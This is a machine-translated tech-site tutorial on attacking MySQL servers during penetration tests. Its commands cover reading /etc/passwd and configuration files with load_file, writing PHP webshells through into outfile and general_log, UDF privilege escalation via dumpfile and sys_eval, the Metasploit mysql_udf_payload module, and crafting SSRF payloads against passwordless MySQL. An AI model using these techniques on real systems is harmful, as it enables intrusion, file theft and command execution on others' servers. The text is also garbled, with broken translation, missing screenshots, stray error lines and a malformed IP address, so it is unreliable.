Shulou(Shulou.com)06/01 Report--

This article mainly explains "how mysql reads files in Linux environment". The explanation content in this article is simple and clear, easy to learn and understand. Please follow the ideas of Xiaobian slowly and deeply to study and learn "mysql reads files in Linux environment" together!

Read file: load_file

load_file can be used to speed up the injection speed by dnslog when reading files during penetration or sql blind injection.

secure_file_priv ：

Files can be read when the mysql secure_file_priv configuration item is empty (empty is "" instead of NULL, NULL means unreadable), or when a directory is specified.

mysql command line view secure_file_priv configuration

show variables like "%secure_file_priv%";

Read service configuration items:

Conditions:

1. selinux is disabled in the system

2. Know service profile path

3. secure_file_priv Readable to web directory

Read mysql configuration file

select load_file("/etc/my.cnf");

In Centos, if selinux is turned on, it is impossible to read other service configuration files or/etc/passwd, so selinux needs to be turned off to read.

In practice, there may be managers who turn selinux off for convenience. So reading other service profiles is worth a try.

close selinux tenforce 0 read web source code

Conditions:

1. selinux is disabled in the system

2. Know the absolute path of the web

3. secure_file_priv Readable to web directory

Read the web source code, you can simply audit, find a breakthrough.

load data infile

Conditions:

1. selinux is disabled in the system

2. Know the absolute path of the web

3. secure_file_priv Readable to web directory

Load data in file is also a statement that reads a server-side file, and the same is limited by secure_file_priv. The basic usage is as follows:

The first step is to have a data table with fields that can store the files we want to read:

Step 2: Use the load data in file statement to read the contents of the specified file and store them in the database:

Assuming that the login user permissions are small, we log in users only need to use file, insert and select permissions, and then just find a data table can also be read.

If you want to read the configuration file, you need to turn off selinux.

Under Windows, there are no such restrictions.

Write a file outfile

When the secure_file_priv configuration item is empty or specifies a directory for which mysql has write permissions. Mysql can be written to files

Note: outfile and dumpfile cannot overwrite files after mysql version 3.23.55. Only new files can be created

Simple example: select "123" into outfile "/tmp/123.txt";

Write WebShell

Conditions:

1. Know the web directory

2. secure_file_priv can be written to the web directory

Take PHP for example:

select "" into outfile "/var/www/html/test.php";

Dumpfile udf

Conditions:

1. mysql plugin directory writable

2. secure_file_priv can be written to the mysql plugin directory

Since the default plugin directory in Centos is unwritable, you need to make it writable if you want to write a udf file. However, I have to admit that there are such administrators in reality. The figure is convenient to set the directory directly to 777.

Pit:

(1) udf file version must correspond to mysql. I don't know what version of MySQL can be queried using the following statement:

select @@version;

(2) Do not use sqlmap linux udf file, will report the following error:

Because sqlmap udf file does not have ELF header:

Note: sqlmap udf path is/usr/share/sqlmap/data/udf/mysql/linux/

udf file to use metasploit:

The requested URL/data/exploits/mysql was not found on this server.

(3) It cannot be misused as outfile, so that the udf file cannot be used. It is estimated that the outfile is not in binary format, but in ordinary ascii code format:

Outfile format (error):

Dumpfile comes out in file format (correct):

Use msf for udf promotion, grab package to view its process.

Note:

The default mysql transmission process uses ssl encryption, and the content cannot be seen directly. We need to switch it to not use ssl encryption

Let's stop the MySQL service:

systemctl stop mysqld

Give mysql user/bin/bash permissions:

vim /etc/passwd

Then switch to mysql user and execute command:

/usr/sbin/mysqld --ssl=0

Parameter--ssl=0 indicates that the transport does not use ssl encryption

Use msf module

exploit/multi/mysql/mysql_udf_payload

Pit:

(1) If MSF response no session was created:

Note target and payload may not be selected

You need to set target to Linux.

The requested URL/shell/bind_tcp was not found on this server. Advanced meter preter may not bounce back

(2) If it is found dead:

At this point we need to connect to mysql and execute the command:

drop function sys_exec;

This is because there is no target and payload set before, but msf has created a good function, but there is no payload to bounce it. We need to delete the original function and let msf create it again to bounce back to the shell

packet capture analysis

We caught the package and found that it was written directly to the hexadecimal code in the udf file:

We first set the msf operation before empty: delete the udf file uploaded, delete the function (drop function statement). Let's do it ourselves:

Copy the hexadecimal code value obtained by grabbing the package. Since it is composed of 1w+ characters, it will not be copied here:

Connect mysql and output the hexadecimal code of this large string of udf files to the udf file by selecting dumpfile:

Note: Since it is hexadecimal code, there is no need to add double quotes when outputting:

select a large string of hex codes into dumpfile "/usr/lib64/mysql/plugin/udf.so";

After mysql successfully writes to the udf file, use the statement:

create function sys_eval returns string soname "udf.so";

You can create a function whose name and function have been set by the.so file.

The udf file we use is called sys_eval.

Call directly:

select sys_eval("whoami");

general log

conditions

1. Know the web path.

This experiment uses mysql 5.7 under Centos7, not to mention selinux and directory permissions, because the file permissions written by general_log are 640, other users (apache users) cannot read. PHP files cannot be executed.

So the general log experiment was done on windows.

Note: general log is not restricted by secure_file_priv

Basic environment:

secure_file_priv is NULL, load file and outfile/dumpfile are not available.

Check the general log status:

show variables like "%general%";

General_log is turned off by default, but we can turn it on manually.

Set log output type to file:

Sometimes mysql default log output type is not FILE but TABLE.

If it is TABLE, it will not output the log to file format.

You need to set its type to FILE

set global log_output="FILE";

Set output file path:

Note: Windows path delimiter is\, but in mysql view,\is an escape character, so we have to use double slash: \\

set global general_log_file="C:\\phpstudy_pro\\WWW\\1.php";

Open general log:

set global general_log=on;

As soon as general log is enabled, all operations on mysql are logged. In order to make the output file impurity a little less. Let's start with the general log.

SSRF bases for Mysql utilization:

Note: There are three ways to connect mysql:

Unix sockets;

Memory sharing/named pipes;

TCP/IP socket;

In Linux or Unix environment, enter mysql -uroot -p123456 to log in to Mysql server using Unix socket method.

Windows system client and Mysql on the same computer, you can use command pipes and shared memory

TCP/IP socket is a method that can be used under any system. It can be used as follows:

mysql -h227.0.0.1 -uroot -p123456

Because Mysql has a password, it is verified by sending a random challenge code, and there is no need to send a random challenge code when there is no password.

Therefore, when we attack Mysql, the Mysql server must have an empty password to attack successfully. After all, random things that change cannot be guessed, so they cannot construct payloads.

The password: (only sent a byte in the past stuck)

And TCP/IP uses SSL by default, so what we catch is a ciphertext packet.

As mentioned above, to force ssl not to be used, add a parameter--ssl=0:

In fact, as long as either the client or the server does not use ssl, the entire tcp transmission process does not use ssl.

Client connections:

mysql -h227.0.0.1 -uroot -p123456 --ssl=0

Pit:

mysql5.7 has a validate_password_length and validate_password_policy, which are used to set the password complexity, and even if the password complexity is reduced to the lowest, it is still necessary to verify the password length, but the password length can only be 4 characters, so it is impossible to set a password of 0 characters.

I can only lower the MySQL version and do the experiment again.

Here I do the experiment is kali mysql, this can be set empty password. But at first kali's mysql had some problems.

Pit:

The MariaDB database used in kali uses Unix_socket by default. As a result, we do not need to enter the password to log in, directly log in, and we cannot catch the tcp transmission packet when we grab the packet.

We are going to modify the MariaDB database to use tcp for transport.

Modify the configuration plug-in (directly in mysql command line):

update mysql.user set plugin='mysql_native_password' where user='root';

After refreshing permissions:

flush privileges experiment SSRF

The first step is to create an experimental user with mysql:

create user 'root'@'%';grant all privileges on *.* to 'root'@'%';

Step 2: Open a Wireshark and listen for packets of lo NIC (lo NIC is the local NIC, and there will only be localhost traffic).

Step 3: Enter the command in mysql and grab the package:

Step 4: Organize the data package:

Set to see only traffic sent by clients

View in hex mode

Copy everything except the middle hexadecimal value, preceded by a "%"

into the following form:

Step 5: Test with Curl:

Note that you need to add--output -here to display it completely.

Thank you for reading, the above is "mysql in Linux environment how to read files" content, after the study of this article, I believe that everyone on mysql in Linux environment how to read files this problem has a deeper understanding, the specific use of the situation also needs to be verified by practice. Here is, Xiaobian will push more articles related to knowledge points for everyone, welcome to pay attention!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.